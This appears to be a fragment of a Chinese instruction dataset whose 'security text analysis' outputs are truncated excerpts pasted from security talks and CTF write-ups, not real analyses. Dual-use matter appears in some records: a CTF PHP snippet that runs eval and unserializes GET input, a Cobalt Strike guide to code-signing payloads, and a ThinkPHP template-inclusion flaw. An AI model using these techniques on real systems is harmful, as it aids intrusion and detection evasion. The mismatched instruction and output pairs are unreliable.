if(strlen($number)>2){ $str = \"\"; $number = str_split($number,2); foreach ($number as $num ) { $str = $str .chr($num); } return strtolower($str); } return chr($number); } public function calc(){ $gf=$this->gf; if(!preg_match('/[a-zA-z0-9]|\\&|\\|#|\\$|%/', $gf)){ eval('$content='.$gf.';'); $content = $this->aiisc_to_chr($content); return $content; } } public function __destruct(){ $this->content_to_file($this->calc()); } } unserialize((base64_decode($_GET['code']))); ?> webct rogue mysq server webtmp hackme <?php class trick { // $gf = \"7076657", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJim Knowledge factors Ownership factors Inherence factors Password Pass phrase Personal identification number (PIN) Challenge response (the user must answer a question) ID card Security token Software token Phone Cell phone Fingerprint Retinal pattern DNA Signature Face Voice Unique bio-electric signals, or other biometric identifier).  ID cardFake Card  ID cardFake Card  Security tokenHigh Security Protection  ID cardFake Card  Security tokenHigh Security Protection  Software tokenExport Token  PhoneFake Phone Number  ID cardFake Card  Security tokenHigh Security Protection  Software tokenExport Token  PhoneFake Phone Number  Cell phoneFake Phone Number and Phone ID  ID cardFake Card  Security tokenHigh Security Protection  Software tokenExport Token  PhoneFake Phone Number  Cell phoneFake Phone Number and Phone ID Static Password Synchronous Dynamic Password Asynchronous Password Challenge Response  Digital signature  Digital signature  Disconnected tokens  Digital signature  Disconnected tokens  Connected tokens  Smart Card  Contactless tokens  Bluetooth tokens  Digital signature  Disconnected tokens  Connected tokens  Smart Card  Contactless tokens  Bluetooth tokens  Single sign-on software tokens Fire and Forget For Time based or event based authentication. No Input data confirm/check function. Fire and Forget For Time based or event based authentication. No Input data confirm/check function. Auto Response For data confirm/check function.  Most connected Token designed as Auto Response Type.  One PIN Code Protection  Digital signature  Support data confirm/check function Auto Response Token  Do not use fixed input data format  Add Trap for protection  Add Dynamic PIN for system Level Fire and Forget Token Unique ID / No entry for attack path / Mixed Mode with Auto Response and Fire and Forget.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Captcha (ppc/Misc, 300p) ### PL Version `for ENG version scroll down` Zadanie polegało na rozwiązaniu 500 kodów captcha poprawnie pod rząd, przy czym można było pomijać których nie chcieliśmy rozwiązywać captche. Serwowane kody miały postać: ![](./captcha.png) W celu rozwiązania zadania napisaliśmy skrypt w pythonie korzystając z Python Images Library, pytesseract oraz Tesseracta. Niemniej wymóg 500 bezbłędnych rozwiązań pod rząd wymagał zastosowania pewnych heurystyk aby ocenić czy zdekodowane przez nas słowo jest aby na pewno poprawne. Cały skrypt dostępy jest [tutaj](captcha.py). Działanie skryptu: Na początek usuwane są różnokolorowe pionowe kreski. W tym celu pobieramy rozkład kolorów dla pikseli i odszukujemy dwa dominujące kolory - wypełnienie oraz tekst captchy (pomijamy kolor biały) a następnie skanujemy obraz i każdy piksel innego koloru niż 2 dominujące jest zamieniany na dominujący. Jeśli piksel sąsiaduje z pikselami o kolorze tekstu wybieramy ten kolor, jeśli nie używamy koloru wypełnienia. Wykonujemy to skryptem: def get_filling(pixels, i, j, best_colors, x_range): left = pixels[(i - 1) % x_range, j] right = pixels[(i + 1) % x_range, j] if left in best_colors and left != best_colors[0]: return left elif right in best_colors and right != best_colors[0]: return right else: return best_colors[0] def fix_colors(im): colors_distribution = im.getcolors() ordered = sorted(colors_distribution, key=lambda x: x[0], reverse=True) best_colors = [color[1] for color in ordered] if (255, 255, 255) in best_colors: best_colors.remove((255, 255, 255)) best_colors = best_colors[:2] pixels = im.load() for i in range(im.size[0]): for j in range(im.size[1]): color = pixels[i, j] if color not in best_colors: pixels[i, j] = get_filling(pixels, i, j, best_colors, im.size[0]) return best_colors[0] W efekcie z powyższego obrazu uzyskujemy: ![](./nostripes.png) Następnym krokiem jest zamiana kolorów obrazu w celu zwiększenia kontrastu i ułatwienia pracy OCRa. Skanujemy obraz i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlindElephant: Web Application Fingerprinting With Static Files Patrick Thomas 7/28/10 Outline  Web Apps & Security  Intro to Fingerprinting  Static File Approach  Observations From A Net Survey  Q & A 2 Well-Known Web Applications  Every conceivable use  Content Management/Blogging  Forums  Email  E-Commerce  DB Admin  Backup and File Storage Admin  Device/System/VM Admin  Version Control UI  Intranet/Collaboration 3 Well-Known Web Applications Theory of Fingerprinting  Find some characteristic(s) that is  always the same for a particular individual (implementation/version/person)  always different from other members of the population  If theres one piece of info that fulfills both, great  If not, take several that pin it down  Tons of interesting reading in information theory and entropy  OS & HTTP Server Fingerprinting: Lots of protocol-aware checks that rely on subtle differences in implementation 5 Existing Fingerprinting Approaches  Labor intensive to add signatures  Manually locate version in files or build regexes for headers  Decent hardening pretty much nukes them  Built-in options to remove identifiers (eg, meta generator)  Remove standard files  Easy to lie to Fingerprinters like this:  Sedusa (in nmap), Wappalyzer, BackendInfo, Plecost, etc, etc 6 More Advanced Tools  Typically improve in one area  Resistant to hardening  Less labor intensive  Have their own downsides  Less specific results  Some request massive amounts of data (> 20 megs!)  Some are less generic (Plecost = Wordpress Only) Fingerprinters like this:  Sucuri, WAFP, WhatWeb, BackEndInfo (sortof), 7 Goals for a (WebApp) Fingerprinter  Very Generic  Fast  Low resource usage  Accurate (Low FP/FN)  Resistant to hardening/banner removal  Super easy to support new versions/apps 8 The Blind Men and the Elephant 9 Collect and Eliminate Possibilities 10 Tree or Elephant Spear or Elephant Vine or Elephant Fan or Elephant Intersect the Possibilities and 11 Web App Versions Hashes Table Paths Table Ve", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nldconfig === 动态链接库管理命令 ## 补充说明 **ldconfig命令** 的用途主要是在默认搜寻目录`/lib`和`/usr/lib`以及动态库配置文件`/etc/ld.so.conf`内所列的目录下搜索出可共享的动态链接库格式如lib*.so*,进而创建出动态装入程序(ld.so)所需的连接和缓存文件缓存文件默认为`/etc/ld.so.cache`此文件保存已排好序的动态链接库名字列表为了让动态链接库为系统所共享需运行动态链接库的管理命令ldconfig此执行程序存放在`/sbin`目录下 ldconfig通常在系统启动时运行而当用户安装了一个新的动态链接库时就需要手工运行这个命令 ### 语法 ```shell ldconfig [-v|--verbose] [-n] [-N] [-X] [-f CONF] [-C CACHE] [-r ROOT] [-l] [-p|--print-cache] [-c FORMAT] [--format=FORMAT] [-V] -?|--[help|--usage] path... ``` ### 选项 ```shell -v或--verbose用此选项时ldconfig将显示正在扫描的目录及搜索到的动态链接库还有它所创建的连接的名字 -n用此选项时,ldconfig仅扫描命令行指定的目录不扫描默认目录/lib/usr/lib也不扫描配置文件/etc/ld.so.conf所列的目录 -N此选项指示ldconfig不重建缓存文件/etc/ld.so.cache若未用-X选项ldconfig照常更新文件的连接 -X此选项指示ldconfig不更新文件的连接若未用-N选项则缓存文件正常更新 -f CONF此选项指定动态链接库的配置文件为CONF系统默认为/etc/ld.so.conf -C CACHE此选项指定生成的缓存文件为CACHE系统默认的是/etc/ld.so.cache此文件存放已排好序的可共享的动态链接库的列表 -r ROOT此选项改变应用程序的根目录为ROOT是调用chroot函数实现的选择此项时系统默认的配置文件/etc/ld.so.conf实际对应的为ROOT/etc/ld.so.conf如用-r /usr/zzz时打开配置文件/etc/ld.so.conf时实际打开的是/usr/zzz/etc/ld.so.conf文件用此选项可以大大增加动态链接库管理的灵活性 -l通常情况下,ldconfig搜索动态链接库时将自动建立动态链接库的连接选择此项时将进入专家模式需要手工设置连接一般用户不用此项 -p或--print-cache此选项指示ldconfig打印出当前缓存文件所保存的所有共享库的名字 -c FORMAT 或 --format=FORMAT此选项用于指定缓存文件所使用的格式共有三种old(老格式)new(新格式)和compat兼容格式此为默认格式 -V此选项打印出ldconfig的版本信息而后退出 -? 或 --help 或 --usage这三个选项作用相同都是让ldconfig打印出其帮助信息而后退出 ``` **ldconfig几个需要注意的地方** 1. 往`/lib`和`/usr/lib`里面加东西是不用修改`/etc/ld.so.conf`的但是完了之后要调一下ldconfig不然这个library会找不到 2. 想往上面两个目录以外加东西的时候一定要修改`/etc/ld.so.conf`然后再调用ldconfig不然也会找不到 3. 比如安装了一个mysql到`/usr/local/mysql`mysql有一大堆library在`/usr/local/mysql/lib`下面这时就需要在`/etc/ld.so.conf`下面加一行`/usr/local/mysql/lib`保存过后ldconfig一下新的library才能在程序运行时被找到 4. 如果想在这两个目录以外放lib但是又不想在`/etc/ld.so.conf`中加东西或者是没有权限加东西那也可以就是export一个全局变量LD_LIBRARY_PATH然后运行程序的时候就会去这个目录中找library一般来讲这只是一种临时的解决方案在没有权限或临时需要的时候使用 5. ldconfig做的这些东西都与运行程序时有关跟编译时一点关系都没有编译的时候还是该加-L就得加不要混淆了 6. 总之就是不管做了什么关于library的变动后最好都ldconfig一下不然会出现一些意想不到的结果不会花太多的时间但是会省很多的事 7. 再有诸如libdb-4.3.so文件头中是会含有库名相关的信息的即含libdb-4.3.so可用strings命令察看因此仅通过修改文件名以冒充某已被识别的库", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 41.1 数据流中的中位数 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/9be0172896bd43948f8a32fb954e1be1?tpId=13&tqId=11216&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 如何得到一个数据流中的中位数如果从数据流中读出奇数个数值那么中位数就是所有数值排序之后位于中间的数值如果从数据流中读出偶数个数值那么中位数就是所有数值排序之后中间两个数的平均值 ## 解题思路 ```java /* 大顶堆存储左半边元素 */ private PriorityQueue<Integer> left = new PriorityQueue<>((o1, o2) -> o2 - o1); /* 小顶堆存储右半边元素并且右半边元素都大于左半边 */ private PriorityQueue<Integer> right = new PriorityQueue<>(); /* 当前数据流读入的元素个数 */ private int N = 0; public void Insert(Integer val) { /* 插入要保证两个堆存于平衡状态 */ if (N % 2 == 0) { /* N 为偶数的情况下插入到右半边 * 因为右半边元素都要大于左半边但是新插入的元素不一定比左半边元素来的大 * 因此需要先将元素插入左半边然后利用左半边为大顶堆的特点取出堆顶元素即为最大元素此时插入右半边 */ left.add(val); right.add(left.poll()); } else { right.add(val); left.add(right.poll()); } N++; } public Double GetMedian() { if (N % 2 == 0) return (left.peek() + right.peek()) / 2.0; else return (double) right.peek(); } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA New Approach to Digital Forensic Methodology And !!BUSTED!! Case studies David C. Smith Samuel Petreski Introductions  David C. Smith, Georgetown University, & HCP Forensic Services  David works as the CSO for Georgetown University and a co-owner of HCP Forensic Services providing information security programs, digital forensics, and expert witness testimony. He has been in the technical field for over 20 years and enjoys engaging in complex technical problems.  Samuel Petreski, Georgetown University  Samuel Petreski works as a Senior Security Analyst for Georgetown University and an owner of Remote IT Consulting. Samuel has worked mostly in higher-ed focusing on network architecture and administration, as well as building and administering scalable network security solutions. He possesses over 10 years of experience in the IT field working in very diverse environments. The IDEA  Read Mapping Process of Digital Forensic Investigation Frameworks  Selamat, Yusof, and Sahib [IJCSNS Vol 8 No 10, Oct 2008]  Thought: Lots of methodologies out there, but none were what I taught or saw as issues when running a forensic team.  Why not make my processes and methods into a new, practical methodology? Mapping Process of Digital Forensic Investigation Framework Mapping Process of Digital Forensic Investigation Framework, Selamat, Yusof, Sahib, 2008 Typical Digital Investigation Methodologies  Most frameworks cover the range from acquisition to reporting  Such as:  Obtaining authorization for investigations  Determining evidence locations  Determining and validating techniques to find and interpret significant data  Summarize and provide explanation of conclusions What is a Digital Forensic Methodology? DOJ Methodology (1) DOJ Methodology (2) Stages / Processes / Phases  There are some really good methodologies out there  Integrated Digital Investigation process (IDIP), Digital Forensic Research Workshop (DFRWS)  Identification, preservation, examination, analysis, presentation", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n怎样用 Cobalt Strike 生成具有代码签名的 payload  By Digg3r 转换证书格式和转换过程中遇到的坑 可以看 CS 官方文档或者作者的 youtube 视频profile 中配置签名是 jks 格式而 windows 是 pfx 结尾的默认是 pkcs12 格式所以需要转换成 JAVA 的 jks 格式, 一个 profile 代码签名的配置示例如下 code-signer { set keystore \"codesign.jks\"; set password \"123456\"; set alias \"server\"; } 不想配置 porfile 也可以不转换因为有点小麻烦完全可以在生成 payload 后直接用 微软的 signtool 签名命令如下 signtool.exe sign /f C:\\codesign.pfx /p password C:\\Payload.exe #其中/f 指定 pfx 签名证书 /p 证书密码 /t 签名用的时间戳服务器 最后是要签名的 paylaod.exe 好吧开始搞起pfx 转 jks 转换命令如下具体看图片中的注释吧 命令如下 keytool -importkeystore -srckeystore codesign.pfx -destkeystore codesign.jks -srcstoretype PKCS12 -deststoretype JKS 图 2 上面配置示例可以看出有三个配置项一个是 keystore 设置证书文件位置一个证书 passowrd 密钥一个别名 alias转换的时候好想无法直接指定 alias 证书别名所以用如 下命令查看 alias可以看出是随机生成的一个字符串 图表 3 复制字符串到配置稳重那么代码签名相关配置如下 图表 4 完成后用 c2lint 测试下 profile会提示找到代码签名配置如下图 ./c2lint mycs.profile #c2lint 在 cboaltstrike.jar 同一目录 图表 5 Ok接下来运行 CS 连接 teamserver生成 pyaload如下图sign 就可以打勾了 图表 6 结果发现生成的 exe 或 dll 并没有被签名而且本地 CS 在终端中报错了如下图 尼玛又看遍作者的视频发现没有错误啊 注意作者演示的是自签名证书 图表 7 百度下 keytool 发现是 alias 也有个密码怀疑 profile 配置文件那个 password 指的是 证书 alias 密码具体 jks 证书的证书密码和 alias 密码有啥区别我也不知道然后修改 alias 密码修改 alias 密码需要原 alias 密码其实和原证书 pfx 格式的证书密码一样如下命令 修改修改为 123456 图表 8 这样再重新加载 profile 生成 exe 或 dll右键属性发现就会是签名的了就不截图了 最后补充 查看官方文档中说是 password 位置说的是 keystoreWhat the fuck  不懂 一 文章中涉及的命令总结 Signtool 签名 exedllmsi signtool.exe sign /f C:\\codesign.pfx /p password /t http://timestamp.globalsign.com/scripts/timestamp.dll C:\\Payload.exe PFX 转换 JKS keytool -importkeystore \\ -srckeystore codesign.pfx \\ -destkeystore codesign.jks \\ -srcstoretype PKCS12 \\ -deststoretype JKS 查看别名需要证书密码 keytool -list -keystore codesign.jks 修改别名密码需要原别名密码 keytool -keypasswd -keystore codesign.jks -alias thealiasname", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMach-o Malware Analysis: Combatting Mac OSX/iOS Malware with Data Visualization INCOMPLETE DRAFT: PLEASE SEE LAST PAGE FOR FINAL PPTX Remy Baumgarten Security Engineer at ANRC Services https://www.linkedin.com/in/remybaumgarten Website: anrc-services.com Twitter: @anrctraining Friday, July 12, 13 About me mobile malware talks/ tutorials present: research and development (ANRC Services) Past: Malware team (Booz Allen Hamilton) past: secure dna Friday, July 12, 13 Why a new tool? Examining and evaluating the existing tools available to help decipher the Mach-O format. Finding working examples of security products equipped to process Mach-O malware. Attempting to find a tool that could analyze these files regardless of the underlying architecture. Researching a better way to view the file internals of Mach-O files. Friday, July 12, 13 tools that analyze mach-o We wanted to fuse the best features of all of these programs and add a focus on network security. Ultimately the goal is to help the network defender understand the Mach-O file format better and provide a method to effectively and efficiently analyze a particular binary for malicious behavior. Friday, July 12, 13 mach-o Viz presents a mach-o binary visually in turn this makes it easier for anyone to see how the file is constructed Visual representation from the header through the load commands and into all its corresponding segments Interactive so you can zoom into segments for more detail Introducing Friday, July 12, 13 In addition, to visualizing the file format itself: we wanted a powerful back-end graph visualization and analytics system for graphing the binarys disassembly Currently supports i386, x86_64 and ARM6/7. We wanted to keep this program not only as visual as possible but also accessible: Only a web browser is required to perform interactive analysis Design Features Friday, July 12, 13 Design Features Use any client capable of running HTML5/JavaScript, thereby significantly increasing the types of d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The Tor Project Our mission is to be the global resource for technology, advocacy, research and education in the ongoing pursuit of freedom of speech, privacy rights online, and censorship circumvention. 2  Online Anonymity  Open Source  Open Network  Community of researchers, developers, users and relay operators.  U.S. 501(c)(3) non- pro%t organization 3 Estimated 2,000,000+ daily Tor users 4 Threat model: what can the attacker do? Alice Anonymity network Bob watch (or be!) Bob! watch Alice! Control part of the network! 5 Anonymity isn't encryption: Encryption just protects contents. Alice Bob Hi, Bob! Hi, Bob! <gibberish> attacker 6 Anonymity serves different interests for different user groups. Anonymity It's privacy! Private citizens 7 Anonymity serves different interests for different user groups. Anonymity Private citizens Businesses It's network security! It's privacy! 8 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's traffic-analysis resistance! It's network security! It's privacy! 9 Anonymity serves different interests for different user groups. Anonymity Private citizens Governments Businesses It's traffic-analysis resistance! It's network security! It's privacy! Human rights activists It's reachability! 10 The simplest designs use a single relay to hide connections. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X (example: some commercial proxy providers) 11 But a central relay is a single point of failure. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Evil Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X 12 ... or a single point of bypass. Bob2 Bob1 Bob3 Alice2 Alice1 Alice3 Irrelevant Relay E(Bob3,X) E(Bob1, Y) E(Bob2, Z) Y Z X Timing analysis bridges all connections through relay  An attractive fat target 13 14 15 16 Tor's safety comes from diversity  #1: Diversity of relays. The more relays we have and the more diverse they are, the fewer attackers are in a posi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Time is not your friend (re, 200p) ### PL [ENG](#eng-version) Dostajemy [program](./re200) (elf), do zbadania, i rozpoczynamy analizę działania. Ciekawe w programie jest to, że czyta żadnych plików, ani nie chce nic od użytkownika, ani nie bierze żadnych parametrów z linii poleceń - po prostu sie wykonuje. Trzon programu opiera się na następującym kodzie: ```c++ bool test(int a1) { int v3 = a1; int v4 = 0; while (v3) { v1 = clock(); sleep(5); v4 += v3 % 10; if (clock() - v1 <= 19) { v3 *= 137; } v3 /= 10; } return v4 == 41; } int getint() { v0 = clock(); sleep(5); if (clock() - v0 > 19) result = 49000000; else result = 33000000; return result; } int main() { int v2 = 2; int v4 = 2; while(true) { int i; for ( i = 2; v4 - 1 >= i && v4 % i; ++i ); if (i == v4) { v0 = clock(); ++v2; sleep(3); if ( clock() - v0 <= 19 ) exit(0); if(getint() <= v2 && test(v4)) { printf(\"Well done\\n\", v4); break; } } v4++; } } ``` Widać masę bezsensownego kodu i sleepów. Ale przede wszystkim, co tu się dzieje? Program testuje liczby (w v4) od 2 do nieskończoności, aż znajdzie taką która mu się \"podoba\" (przechodzi dwa testy). Wtedy wypisuje \"well done\". Założyliśmy więć, że v4 jest flagą (całkiem słusznie). Pierwszym naszym krokiem było usunięcie wszystkich sleepów (jako że zachowanie kodu zależy od szybkości w kilku miejscach, zakładamy że poprawna ścieżka to ta gdzie kod wykonuje się długo), żeby przyśpieszyć kod do takiego stanu żeby kiedyś otrzymać v4. ```c++ bool test(int a1) { int v3 = a1; int v4 = 0; while (v3) { v1 = clock(); v4 += v3 % 10; v3 /= 10; } return v4 == 41; } int getint() { return 49000000; } int main() { int v2 = 2; int v4 = 2; while(true) { int i; for ( i = 2; v4 - 1 >= i && v4 % i; ++i ); if (i == v4) { ++v2; exit(0); if (getint() <= v2 && test(v4)) { printf(\"DCTF{%d}\\n\", v4); break; } } v4++; } } ``` Następnie patrzymy na działanie kodu. Po usunięciu sleepów kod robi dalej to co oryginał, ale szybciej. Myślimy więc jak go dalej przyśpieszyć. Na pewno rzuca się w o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCMS 0x00 CMS assign_resume_tpl http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php assign_resume_tpl 0x01 CMS Thinkphp 3.2.3 3.2.3 URL CMS GET Home User login mca/GET http://serverName/index.php/// http://localhost/?m=home&c=user&a=login&var=value 'VAR_MODULE' => 'module', // 'VAR_CONTROLLER' => 'controller', // 'VAR_ACTION' => 'action', // http://localhost/?module=home&controller=user&action=login&var=value 0x02 /Application/Common/Controller/BaseController.class.php assign_resume_tpl $tpl fetch() /ThinkPHP/Library/Think/View.class.php public function assign_resume_tpl($variable,$tpl){ foreach ($variable as $key => $value) { $this->assign($key,$value); } return $this->fetch($tpl); } public function fetch($templateFile='',$content='',$prefix='') { if(empty($content)) { $templateFile = $this->parseTemplate($templateFile); // if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile); }else{ defined('THEME_PATH') or define('THEME_PATH', $this- >getThemePath()); } // ob_start(); ob_implicit_flush(0); if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // PHP $_content = $content; // extract($this->tVar, EXTR_OVERWRITE); // PHP empty($_content)?include $templateFile:eval('?>'.$_content); }else{ // $params = array('var'=>$this- >tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix); Hook::listen('view_parse',$params); } // $content = ob_get_clean(); // Hook::listen('view_filter',$content); // return $content; } PHP /ThinkPHP/Conf/convention.php 111 CMS Think Hook::listen() view_parse /ThinkPHP/Library/Think/Hook.class.php 80 'TMPL_ENGINE_TYPE' => 'Think', // Think 'TMPL_CACHFILE_SUFFIX' => '.php', // 'TMPL_DENY_FUNC_LIST' => 'echo,exit', // 'TMPL_DENY_PHP' => false, // PHP $params = array('var'=>$this- >tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix); Hook::listen('view_parse',$params); /** * * @param string $tag * @param mixed $params * @return void */ static public function listen($", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 单表代换加密通用特点 在单表替换加密中所有的加密方式几乎都有一个共性那就是明密文一一对应所以说一般有以下两种方式来进行破解 - 在密钥空间较小的情况下采用暴力破解方式 - 在密文长度足够长的时候使用词频分析http://quipqiup.com/ 当密钥空间足够大而密文长度足够短的情况下破解较为困难 ### 凯撒密码原理 凯撒密码Caesar加密时会将明文中的 **每个字母** 都按照其在字母表中的顺序向后或向前移动固定数目**循环移动**作为密文例如当偏移量是左移 3 的时候解密时的密钥就是 3 ``` 明文字母表ABCDEFGHIJKLMNOPQRSTUVWXYZ 密文字母表DEFGHIJKLMNOPQRSTUVWXYZABC ``` 使用时加密者查找明文字母表中需要加密的消息中的每一个字母所在位置并且写下密文字母表中对应的字母需要解密的人则根据事先已知的密钥反过来操作得到原来的明文例如 ``` 明文THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 密文WKH TXLFN EURZQ IRA MXPSV RYHU WKH ODCB GRJ ``` 根据偏移量的不同还存在**若干特定的恺撒密码名称** - 偏移量为 10Avocat AK - 偏移量为 13[ROT13](https://zh.wikipedia.org/wiki/ROT13) - 偏移量为 -5Cassis K 6 - 偏移量为 -6Cassette K 7 此外还有还有一种基于密钥的凯撒密码 Keyed Caesar其基本原理是 **利用一个密钥将密钥的每一位转换为数字一般转化为字母表对应顺序的数字分别以这一数字为密钥加密明文的每一位字母** 这里以 **XMan 一期夏令营分享赛宫保鸡丁队 Crypto 100** 为例进行介绍 ``` 密文s0a6u3u1s0bv1a 密钥guangtou 偏移6,20,0,13,6,19,14,20 明文y0u6u3h1y0uj1u ``` ### 凯撒密码破解 对于不带密钥的凯撒密码来说其基本的破解方法有两种方式 1. 遍历 26 个偏移量适用于普遍情况 2. 利用词频分析适用于密文较长的情况 其中第一种方式肯定可以得到明文而第二种方式则不一定可以得到正确的明文 而对于基于密钥的凯撒密码来说一般来说必须知道对应的密钥 ### 凯撒密码工具 一般我们有如下的工具其中JPK比较通用 - JPK可解带密钥与不带密钥 - http://planetcalc.com/1434/ - http://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php ### Atbash Cipher原理 埃特巴什码Atbash Cipher其实可以视为下面要介绍的简单替换密码的特例它使用字母表中的最后一个字母代表第一个字母倒数第二个字母代表第二个字母在罗马字母表中它是这样出现的 ``` 明文A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 密文Z Y X W V U T S R Q P O N M L K J I H G F E D C B A ``` 下面给出一个例子 ``` 明文the quick brown fox jumps over the lazy dog 密文gsv jfrxp yildm ulc qfnkh levi gsv ozab wlt ``` ### Atbash Cipher破解 可以看出其密钥空间足够短同时当密文足够长时仍然可以采用词频分析的方法解决 ### 简单替换密码原理 简单替换密码Simple Substitution Cipher加密时将每个明文字母替换为与之唯一对应且不同的字母它与恺撒密码之间的区别是其密码字母表的字母不是简单的移位而是完全是混乱的这也使得其破解难度要高于凯撒密码 比如 ``` 明文字母 : abcdefghijklmnopqrstuvwxyz 密钥字母 : phqgiumeaylnofdxjkrcvstzwb ``` a 对应 pd 对应 h以此类推 ``` 明文the quick brown fox jumps over the lazy dog 密文cei jvaql hkdtf udz yvoxr dsik cei npbw gdm ``` 而解密时我们一般是知道了每一个字母的对应规则才可以正常解密 ### 简单替换密码破解 由于这种加密方式导致其所有的密钥个数是$26!$ 所以几乎上不可能使用暴力的解决方式所以我们 一般采用词频分析 ### 仿射密码原理 仿射密码的加密函数是 $E(x)=(ax+b)\\pmod m$其中 - $x$ 表示明文按照某种", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKenny @ Chroot.org Operation GG (Good Game) 台灣最熱門網遊安裝檔 驚見APT後門  Introduction 玩家角度 (Kenny)  如何發現 / 偵測?  Event TimeLine  Operation Winnti (Kaspersky 報告) (GD)  Operation Old Cooper 通報+追查(PK)  Unplugging PlugX 清除 (Trend Micro) I am just a Player. 線上遊戲代理商以串連世界玩家一同遊戲為主要事業 在東南亞和台灣創造了最大的線上遊戲平台 英雄連萌 流氓按到 2014.12.26 好久沒玩LOL, 來虐菜(欺負新手)一下~ .. 如果是一般玩家很可能.. 驚慌失措類型 我的謎片檔案安全嗎? 誰可以幫我處理? 電腦會爆炸嗎? 有個性類型 爛防毒拉 誤報拉 電腦關機 病毒就會餓死拉 第一時間我覺得 WTF !! 我只是想玩LOL 沒有要玩病毒阿. 這下好玩了 研究一下病毒從哪來的呢? 但我剛好是略懂資安技能的玩家 最簡單的辨認方法 https://www.virustotal.com/ 惡意後門存放位置 C:\\windows\\System32\\NtUserEx.dll C:\\windows\\System32\\NtUserEx.dat C&C Server位置 Domain: gs2.playdr2.tw gs3.playdr2.tw gs4 playdr2 tw 特徵 update?id=00xxxxxx 秉持著調查精神 決定更深入追查 取得遊戲管道 官網下載器 Game 官網頁面 Game Cloud Server 調查結果 https://vulreport.net/ 佈 由這次的後門看出攻擊者可能有特殊身分 討論後有了更驚人的發現 (這些都是公開報告可上卡巴網站下載) 資料來源各大資安公司報告", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Emperor Has No Cloak - WEP Cloaking Exposed Deepak Gupta and Vivek Ramachandran Security Research Team (Amit, Gopi, Pravin) 1. Summary: WEP Cloaking is a recently proposed anti-WEP-cracking technique that is claiming to be the savior of legacy WLAN devices still replying on WEP encryption. The WEP Cloaking mechanism is meant to be used in Wireless Intrusion Prevention Systems (WIPS) to protect WEP encrypted networks. The WEP Cloaking technique sends spoofed WEP encrypted packets a.k.a. chaff into the air. These packets are specially crafted to try and confuse WEP cracking tools which subsequently would fail to crack the WEP key. In course of our talk, we will demonstrate that WEP Cloaking is no panacea; it can at best delay WEP key cracking by a few seconds. We will discuss 3 techniques: Visual Inspection, Sequence number + IV filtering, and Active Frame Replay to reliably beat WEP Cloaking. We also plan to release new tools and patches for existing ones to incorporate these techniques. 2. History of WEP Cracking In 2001, Fluhrer, Mantin and Shamir, in their celebrated paper Weaknesses in the Key Scheduling Algorithm of RC4, proved that WEP could be cracked using statistical attacks. A few years later, in 2004, Korek released a couple of more statistical attacks, making WEP key cracking even faster. Soon after, many WEP cracking tools were released into the public domain, making WEP cracking an absolute Script-Kiddie job. WEP cracking tools work by collecting WEP encrypted packets over the air, then run them through these statistical attack filters and try to converge to the authorized networks key. It is important to note here that not all WEP encrypted packets aid in cracking the key. Only those which contain Weak IVs help in the cracking process. An IV is the Initialization Vector which is transmitted in the clear with each WEP encrypted packet and is used along with the WEP key to decrypt the packet. A Weak IV is an IV which satisfies one or more of the FMS ", "category": "text_analysis", "source": "security_papers"}
